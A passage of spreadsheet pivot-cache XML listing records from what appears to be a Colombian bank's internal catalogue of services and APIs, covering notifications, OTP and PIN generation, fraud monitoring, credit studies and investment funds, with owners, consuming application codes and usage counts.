    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW0922 _x000d__x000a_AW1108001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Notificacion Push"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Como mecanismos de envío de Alertas y Notificaciones, se tendrán 3 posibilidades, Correo Electrónico, SMS y Notificaciones Push. Para el envío de Notificaciones Push, es necesario que el usuario previamente se haya enrolado en el sistema mediante la APP Personas y se haya actualizado la base de PCC Alertas y Notificaciones para habilitar el envío por este medio. Con esta habilitación, el sistema de Alertas y Notificaciones en Iseries, podrá hacer uso de este servicio que permitirá enviar la información necesaria al Gestor de Envío para enviar la Notificación Push al teléfono del usuario."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="NU0100001 _x000d__x000a_ISPCC0002"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Sms Inalambria"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio está enfocado a consumidores transaccionales que realizan envío de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_SMS Inalambria_ISPCC0011"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW1373 _x000d__x000a_AW0407 _x000d__x000a_AW1313 _x000d__x000a_AW1097001 _x000d__x000a_NU0109001 _x000d__x000a_AW1316001 _x000d__x000a_AW0360007 _x000d__x000a_AW1287001 _x000d__x000a_AW1235002 _x000d__x000a_NU0100001 _x000d__x000a_NU107001 _x000d__x000a_NU0004001 _x000d__x000a_AW1315001 _x000d__x000a_AW1287 _x000d__x000a_AW1286001 _x000d__x000a_AW1128 _x000d__x000a_AW1081001 _x000d__x000a_AW0157 _x000d__x000a_AW0939001 _x000d__x000a_NU0010001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW0955001 _x000d__x000a_AW1185001 _x000d__x000a_AW1313001 _x000d__x000a_AW0214001 _x000d__x000a_AW1151001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Sms Redeban"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite realizar el envío de SMS a través del proveedor Redeban. Dichos mensajes corresponden principalmente a los generados por Alertas y Notificaciones que se encuentra en Iseries. Dichas alertas son generadas dada la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes._x000a__x000a_Su función será recibir la trama plana que entrega Iseries para transformarla y entregar al proveedor la estructura XML para el envío del SMS. Por lo tanto no es reusable para otros proyectos._x000a__x000a_El envío se hace uno a uno._x000a_"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Estudio Credito Consumo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio habilita el análisis de un determinado cliente con el fin de evaluar cuales productos de crédito de consumo se le pueden otorgar."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="APM_AW1081001"/>
    <s v="AW0937 _x000d__x000a_AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW1011 _x000d__x000a_APICONNECT _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_AW1299001 _x000d__x000a_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-04T14:42:15"/>
    <s v="Factoring"/>
    <n v="100"/>
    <s v="Factoring - Obligations"/>
    <n v="100"/>
    <x v="195"/>
    <s v="El Api permite a los consumidores obtener el listado de todas las operaciones u obligaciones de Factoring que tenga un cliente, sean de descuento de facturas o lí­nea triangular y con información detallada de cada obligación"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Factoring"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Factoring"/>
    <s v="Lucas Daniel Betancourt"/>
    <m/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ APP_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="30249"/>
    <n v="27627"/>
    <n v="25490"/>
    <n v="26293"/>
    <n v="27255"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-08-10T16:26:53"/>
    <s v="Fiduciary Agreement"/>
    <n v="100"/>
    <s v="Fiduciary Agreement - Information"/>
    <n v="100"/>
    <x v="196"/>
    <s v="Esta API permitirá a los consumidores consultar la información básica de los acuerdos fiduciarios, las cuentas y terceros de los acuerdos fiduciarios"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Fiduciary_Pdn _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-08-10T17:37:57"/>
    <s v="Fiduciary Payment Order"/>
    <n v="100"/>
    <s v="Fiduciary Payment Order - Information"/>
    <n v="100"/>
    <x v="197"/>
    <s v="Permite consultar y validar información de las ordenes de pago, ya que esta permite consultar el listado de pagos, validar si están duplicados o si son extemporaneos"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="FiduciaryPaymentOrderInformation_NU0325001 _x000d__x000a_ FiduciaryPaymentOrderInformation_NU0325001 _x000d__x000a_ FiduciaryPaymentOrderInformation_NU0325001 _x000d__x000a_ FiduciaryPaymentOrderInformation_NU0325001 _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Filter Captcha"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Filtro funcional de captcha, consumiendo los servicios de Google y Huawei"/>
    <s v="Transf_y_Soporte_Distribución_Digital"/>
    <s v="Distribucion Digital"/>
    <x v="13"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="ALM"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-05-20T11:09:59"/>
    <s v="Loans Study Vehicle"/>
    <n v="101"/>
    <s v="Final Study"/>
    <n v="101"/>
    <x v="198"/>
    <s v="El proceso de Estudio Final, permite el registro de la información de los datos adicionales del cliente, actividad económica, financieros para realizar la ejecución del estudio finalpara el crédito de véhiculo y obtener una aprobación, un rechazo o alguna alternativa adicional como mejorar la capacidad de pago o proceder a un proceso manual."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VentasDigitalesSufi_NU0037 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-06T02:22:21"/>
    <s v="Loans Study Vehicle"/>
    <n v="105"/>
    <s v="Final Study"/>
    <n v="105"/>
    <x v="198"/>
    <s v="El proceso de Estudio Final, permite el registro de la información de los datos adicionales del cliente, actividad económica, financieros para realizar la ejecución del estudio finalpara el crédito de véhiculo y obtener una aprobación, un rechazo o alguna alternativa adicional como mejorar la capacidad de pago o proceder a un proceso manual."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VentasDigitalesSufiVehiculos_AW1097001 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="21273"/>
    <n v="20936"/>
    <n v="16902"/>
    <n v="17884"/>
    <n v="22457"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-05-11T15:01:20"/>
    <s v="Fixed Deposit Account"/>
    <n v="110"/>
    <s v="Fixed Deposit Account - Balances"/>
    <n v="110"/>
    <x v="199"/>
    <s v="La API Fixed Deposit Account  Balances permitirá a los diferentes consumidores poder obtener los diferentes saldos de forma detallada para los tipos de productos TDA: Plazos fijos que se posee en las Filiales del Exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010 _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="672"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-06-22T10:46:44"/>
    <s v="Fixed Deposit Account"/>
    <n v="202"/>
    <s v="Fixed Deposit Account - Frequency"/>
    <n v="101"/>
    <x v="200"/>
    <s v="Capacidad que  permite realizar la consulta de las posibles periodicidades en el pago de  intereses de una inversión virtual, segíºn el plazo máximo impuesto por el producto.  "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <s v="ConsultaPeriodicidad/V1.0"/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <n v="1"/>
    <n v="2188"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-06-22T10:46:44"/>
    <s v="Fixed Deposit Account"/>
    <n v="202"/>
    <s v="Fixed Deposit Account - Management"/>
    <n v="121"/>
    <x v="201"/>
    <s v="Api que permite al cliente realizar la simulación, renovar o desactivar la inversión virtual"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <s v="GestionInversiones/V1.0"/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="146809"/>
    <n v="167648"/>
    <n v="151453"/>
    <n v="166315"/>
    <n v="247824"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-06-22T10:46:44"/>
    <s v="Fixed Deposit Account"/>
    <n v="202"/>
    <s v="Fixed Deposit Account -Accounts"/>
    <n v="122"/>
    <x v="202"/>
    <s v="El API tiene como propósito ofrecer distintas capacidades de consulta relacionadas con los productos de inversión virtual, entre ellos:  - realizar la consultas de tasas de la Inversión Virtual  de acuerdo a las condiciones ingresadas por el cliente.   - Consultar las inversion virtuales que se encuentran activas de un cliente  - Consultar el detalle de una inversion virtual en particular "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <s v="ConsultaInversiones/V1.0"/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="131801"/>
    <n v="139572"/>
    <n v="239616"/>
    <n v="708788"/>
    <n v="727682"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-31T10:40:08"/>
    <s v="Fraud"/>
    <n v="101"/>
    <s v="Fraud - Monitoring"/>
    <n v="101"/>
    <x v="203"/>
    <s v="El api **Fraud - Monitoring** permite realizar un monitoreo antifraude para las transacciones realizadas por un cliente Bancolombia.   El api cuenta con la Operación **&quot;Transferences/actions/analyze&quot;:**   Dicha operación permite obtener un puntaje de riesgo del cliente al momento de ejecutar una transacción por medio de Bancolombia.   En caso de ser un puntaje negativo, el proceso transaccional realiza sus respectivas.   El api debe ser consumido con todos sus campos debidamente diligenciados, para que pueda realizar su monitoreo exitosamente y devolver el puntaje de riesgo en el campo &quot;**riskScore**&quot;, de lo contrario dará una respuesta indicando que los campos deben ser diligenciados correctamente."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="2935"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-26T15:24:26"/>
    <s v="fraud evaluation"/>
    <n v="100"/>
    <s v="Fraud evaluation - Fraud monitoring"/>
    <n v="100"/>
    <x v="204"/>
    <s v="Este servicio evalíºa el riesgo de una transacción en modo sí­ncrono, aplicando sobre la misma los filtros definidos en el ámbito de monitoreo transaccional, es decir, reglas que validen condiciones de las transacciones, adicional, el score de riesgo que SAS FM (herramienta que responde el score a Thanos) genera de acuerdo al perfil transaccional del cliente. Esta api también permitirá a los canales usar análisis comportamental para identificar riesgos de una transacción del cliente con base en el comportamiento que este tenga en los dispositivos que usa "/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="AW1333002_FraudEvaluation _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="12"/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-26T12:28:17"/>
    <s v="Fund Administration"/>
    <n v="150"/>
    <s v="Fund Administration - Consolidated Balances"/>
    <n v="200"/>
    <x v="205"/>
    <s v="Esta API permite consultar el saldo consolidado de los fondos de inversión colectiva de un cliente."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V2.0"/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <m/>
    <n v="11149"/>
    <n v="3530"/>
    <n v="6367"/>
    <n v="27550"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-06-02T22:11:19"/>
    <s v="Fund Administration"/>
    <n v="102"/>
    <s v="Fund Administration - Information"/>
    <n v="102"/>
    <x v="206"/>
    <s v="La API permite consultar la información de un fondo de inversión, ya sea de Valores o Fiduciaria del Grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V1.0"/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="383"/>
    <n v="213"/>
    <n v="1430"/>
    <n v="2558"/>
    <n v="3151"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-26T00:06:18"/>
    <s v="Fund Administration"/>
    <n v="150"/>
    <s v="Fund Administration - Information"/>
    <n v="200"/>
    <x v="206"/>
    <s v="Permite consultar la información de un fondo de inversión colectiva (Valores o Fiduciaria) del Grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V2.0"/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="16"/>
    <n v="157"/>
    <n v="114582"/>
    <n v="567210"/>
    <n v="539779"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-26T12:28:17"/>
    <s v="Fund Administration"/>
    <n v="150"/>
    <s v="Fund Administration - Management"/>
    <n v="111"/>
    <x v="207"/>
    <s v="Esta API permitirá a los consumidores realizar la administración de los Fondos de Inversión Colectiva (Fiduciaria, Valores) Grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="1518"/>
    <n v="1042"/>
    <n v="827"/>
    <n v="1561"/>
    <n v="1116"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-09T00:09:52"/>
    <s v="Fund Administration"/>
    <n v="150"/>
    <s v="Fund Administration - Transactions"/>
    <n v="210"/>
    <x v="208"/>
    <s v="La API permite consultar los movimientos detallados de los fondos de inversión del Grupo Bancolombia, ya sea de Valores o Fiduciaria."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V2.0"/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="11"/>
    <n v="20"/>
    <n v="11"/>
    <n v="3"/>
    <n v="6"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-26T12:28:17"/>
    <s v="Fund Administration"/>
    <n v="150"/>
    <s v="Fund Administration - Transfers"/>
    <n v="131"/>
    <x v="209"/>
    <s v="La API Fund Administration - transfers permitirá a los consumidores realizar operaciones de transferencias de fondos de inversión colectiva."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="TransferenciasFondosDeInversion/V1.0"/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="7338"/>
    <n v="10142"/>
    <n v="5228"/>
    <n v="4926"/>
    <n v="5292"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Generacion PIN"/>
    <n v="100"/>
    <x v="0"/>
    <s v="La operación que incluye este servicio le permite a un cliente generar el PIN (clave de acceso) el cual le permite autenticarse en el uso de los diferentes canales electrónicos del Banco."/>
    <m/>
    <m/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Generacion Token"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que hace uso de la capacidad de generación de PINES del iSeries, el token generado se podrá enviar al correo electrónico o como mensaje de texto ( SMS) al celular del individuo que se desea autenticar."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="_x000a_PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_NU0034001 _x000d__x000a_AW1097001 _x000d__x000a_AW0638 _x000d__x000a_NU0127001 _x000d__x000a_AW1206001 _x000d__x000a_AW1170 _x000d__x000a_NU0104001 _x000d__x000a_NU0014001 _x000d__x000a_AW1165 _x000d__x000a_NU0004001 _x000d__x000a_AW1287 _x000d__x000a_AW1150 _x000d__x000a_AW1128 _x000d__x000a_AW1312001 _x000d__x000a_AW0955 _x000d__x000a_AW0939 _x000d__x000a_AW1011 _x000d__x000a_AW0638001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW0955001 _x000d__x000a_AW1203001 _x000d__x000a_AW1316 _x000d__x000a_NU01270012 _x000d__x000a_NU0046001 _x000d__x000a_AW0660 _x000d__x000a_AW1435001 _x000d__x000a_AW1299001 _x000d__x000a_NU0204001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Generar Codigo Seguridad"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio implementa la funcionalidad para generar el código de seguridad en IAM y enviarlo a través del Componente de Alertas al cliente, permitiéndole así generar su clave principal."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Generar OTP"/>
    <n v="110"/>
    <x v="0"/>
    <s v=" Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID._x005f_x000D_ _x005f_x000D_ El alcance del servicio GenerarOTP, comprende la especificación del modelo de servicio requerido para el funcionamiento de la capacidad de negocio de Generación y Asignación de tokens a los clientes con el segundo factor de autenticación vía OTP._x005f_x000D_ _x005f_x000D_ El servicio ya existe en su versión 1.1 con la operación generarOTPODA, en esta nueva versión 2 se cambiará la firma para que sea el consumidor quien envíe el sharedkey del cliente y no el servicio quien lo asigne programáticamente._x005f_x000D_ Adicionalmente se agrega la operación generarEnviarOTPODA que habilitará no solo la generación del OTP sino también su envío a través del componente de alertas y notificaciones del banco, permitiendo así a los consumidores finales no tener que hacer dos llamados independientes para generar y luego enviar el OTP."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="AW0638"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Generar OTP"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID._x000a_ _x000a_ El alcance del servicio GenerarOTP, comprende la especificación del modelo de servicio requerido para el funcionamiento de la capacidad de negocio de Generación y Asignación de tokens a los clientes con el segundo factor de autenticación vía OTP._x000a_ _x000a_ El servicio ya existe en su versión 1.1 con la operación generarOTPODA, en esta nueva versión 2 se cambiará la firma para que sea el consumidor quien envíe el sharedkey del cliente y no el servicio quien lo asigne programáticamente._x000a_ Adicionalmente se agrega la operación generarEnviarOTPODA que habilitará no solo la generación del OTP sino también su envío a través del componente de alertas y notificaciones del banco, permitiendo así a los consumidores finales no tener que hacer dos llamados independientes para generar y luego enviar el OTP."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_NU0004001 _x000d__x000a_AW1287 _x000d__x000a_AW1128 _x000d__x000a_AW1185001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0100001 _x000d__x000a_AW1316001 _x000d__x000a_AW1277001 _x000d__x000a_NU0199001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Alertas y Notificaciones"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Para la comunicación de las transacciones realizadas por un usuario Bancolombia, se provee el servicio de Alertas y Notificaciones, el cual consiste en el envío de una notificación a los medios que el usuario haya autorizado al momento de inscribirse. Esta notificación hará referencia a la los temas que al cliente se le haya configurado previamente en el paquete de alertas en su inscripción al sistema o que él mismo haya personalizado en la Sucursal Virtual Personas o sucursal física. Estas notificaciones incluyen notificar los débitos de las cuentas de ahorro, cuentas de crédito, entre otras.  Con el presente servicio inicialmente se pretende realizar la inscripción en tiempo real al sistema y se hará una vez el cliente se haya vinculado y aperturado un producto en Bancolombia. Dado que un usuario podría inscribirse entregando solo número de celular o solo correo electrónico o los datos, se crean dos operaciones indicando a que tipo de notificación se suscribe el usuario."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Alertas_ISPCC0002"/>
    <s v="AW1177 _x000d__x000a_AW1128 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
